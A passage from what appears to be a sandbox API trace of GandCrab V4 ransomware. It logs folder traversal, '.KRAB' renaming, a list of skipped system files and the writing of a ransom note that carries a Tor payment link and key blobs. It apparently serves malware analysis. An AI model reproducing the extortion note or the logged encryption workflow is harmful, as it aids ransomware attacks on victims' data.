free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0060.867] WriteFile (in: hFile=0x450, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e320, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e320*=0x1f6e, lpOverlapped=0x0) returned 1 [0060.868] CloseHandle (hObject=0x450) returned 1 [0060.868] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.868] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.869] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x8, wMilliseconds=0x47)) [0060.869] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.869] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0060.869] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0060.869] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\d2ca4a08d2ca4dee3d.lock") returned 106 [0060.869] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x450 [0060.872] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.872] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.872] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\") returned 83 [0060.872] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*" [0060.872] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*", lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0xfbd320 [0060.872] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.872] FindNextFileW (in: hFindFile=0xfbd320, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0060.872] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.872] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.872] FindNextFileW (in: hFindFile=0xfbd320, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0060.872] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0060.872] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0060.872] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\d2ca4a08d2ca4dee3d.lock" [0060.872] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.872] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 111 [0060.872] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\d2ca4a08d2ca4dee3d.lock") returned 106 [0060.872] lstrlenW (lpString=".lock") returned 5 [0060.872] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.873] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0060.873] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.873] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.873] FindNextFileW (in: hFindFile=0xfbd320, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0060.873] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0060.873] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0060.873] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\KRAB-DECRYPT.txt" [0060.873] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.873] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\KRAB-DECRYPT.txt.KRAB") returned 104 [0060.873] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\KRAB-DECRYPT.txt") returned 99 [0060.873] lstrlenW (lpString=".txt") returned 4 [0060.873] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.873] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0060.873] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.874] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\KRAB-DECRYPT.txt") returned 99 [0060.874] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\KRAB-DECRYPT.txt") returned 99 [0060.874] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0060.874] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0060.874] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0060.874] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0060.874] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0060.874] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0060.874] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0060.874] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0060.874] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0060.874] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0060.874] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.874] FindNextFileW (in: hFindFile=0xfbd320, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0060.874] lstrcmpW (lpString1="rasphone.pbk", lpString2=".") returned 1 [0060.874] lstrcmpW (lpString1="rasphone.pbk", lpString2="..") returned 1 [0060.874] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpString2="rasphone.pbk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk" [0060.874] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.874] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk.KRAB") returned 100 [0060.874] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned 95 [0060.874] lstrlenW (lpString=".pbk") returned 4 [0060.874] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.875] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".pbk ") returned 5 [0060.875] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.875] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned 95 [0060.875] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned 95 [0060.875] lstrcmpiW (lpString1="rasphone.pbk", lpString2="desktop.ini") returned 1 [0060.875] lstrcmpiW (lpString1="rasphone.pbk", lpString2="autorun.inf") returned 1 [0060.875] lstrcmpiW (lpString1="rasphone.pbk", lpString2="ntuser.dat") returned 1 [0060.875] lstrcmpiW (lpString1="rasphone.pbk", lpString2="iconcache.db") returned 1 [0060.875] lstrcmpiW (lpString1="rasphone.pbk", lpString2="bootsect.bak") returned 1 [0060.875] lstrcmpiW (lpString1="rasphone.pbk", lpString2="boot.ini") returned 1 [0060.875] lstrcmpiW (lpString1="rasphone.pbk", lpString2="ntuser.dat.log") returned 1 [0060.875] lstrcmpiW (lpString1="rasphone.pbk", lpString2="thumbs.db") returned -1 [0060.875] lstrcmpiW (lpString1="rasphone.pbk", lpString2="KRAB-DECRYPT.html") returned 1 [0060.875] lstrcmpiW (lpString1="rasphone.pbk", lpString2="KRAB-DECRYPT.txt") returned 1 [0060.875] lstrcmpiW (lpString1="rasphone.pbk", lpString2="CRAB-DECRYPT.txt") returned 1 [0060.875] lstrcmpiW (lpString1="rasphone.pbk", lpString2="ntldr") returned 1 [0060.875] lstrcmpiW (lpString1="rasphone.pbk", lpString2="NTDETECT.COM") returned 1 [0060.875] lstrcmpiW (lpString1="rasphone.pbk", lpString2="Bootfont.bin") returned 1 [0060.875] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.875] FindNextFileW (in: hFindFile=0xfbd320, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0 [0060.875] FindClose (in: hFindFile=0xfbd320 | out: hFindFile=0xfbd320) returned 1 [0060.875] CloseHandle (hObject=0x450) returned 1 [0060.875] FindNextFileW (in: hFindFile=0xfbd460, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0 [0060.876] FindClose (in: hFindFile=0xfbd460 | out: hFindFile=0xfbd460) returned 1 [0060.876] CloseHandle (hObject=0x448) returned 1 [0060.876] FindNextFileW (in: hFindFile=0xfbd4e0, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0060.876] FindClose (in: hFindFile=0xfbd4e0 | out: hFindFile=0xfbd4e0) returned 1 [0060.876] CloseHandle (hObject=0x440) returned 1 [0060.876] FindNextFileW (in: hFindFile=0xfbd420, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0060.876] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0060.876] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0060.876] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\d2ca4a08d2ca4dee3d.lock" [0060.876] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.876] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 84 [0060.876] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\d2ca4a08d2ca4dee3d.lock") returned 79 [0060.876] lstrlenW (lpString=".lock") returned 5 [0060.876] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.876] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0060.876] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.877] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.877] FindNextFileW (in: hFindFile=0xfbd420, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0060.877] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0060.877] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0060.877] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\KRAB-DECRYPT.txt" [0060.877] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.877] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\KRAB-DECRYPT.txt.KRAB") returned 77 [0060.877] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\KRAB-DECRYPT.txt") returned 72 [0060.877] lstrlenW (lpString=".txt") returned 4 [0060.877] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0060.877] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0060.877] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.877] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\KRAB-DECRYPT.txt") returned 72 [0060.877] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\KRAB-DECRYPT.txt") returned 72 [0060.877] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0060.877] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0060.877] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0060.877] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0060.878] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0060.878] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0060.878] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0060.878] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0060.878] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0060.878] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0060.878] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.878] FindNextFileW (in: hFindFile=0xfbd420, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0060.878] FindClose (in: hFindFile=0xfbd420 | out: hFindFile=0xfbd420) returned 1 [0060.878] CloseHandle (hObject=0x3ac) returned 1 [0060.878] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0060.878] lstrcmpW (lpString1="Office", lpString2=".") returned 1 [0060.878] lstrcmpW (lpString1="Office", lpString2="..") returned 1 [0060.878] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Office" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office" [0060.878] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\" [0060.878] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0060.878] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0060.878] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0060.878] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0060.878] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0060.878] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.879] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0060.879] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\\\KRAB-DECRYPT.txt") returned 72 [0060.879] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Office\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\office\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0060.880] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB 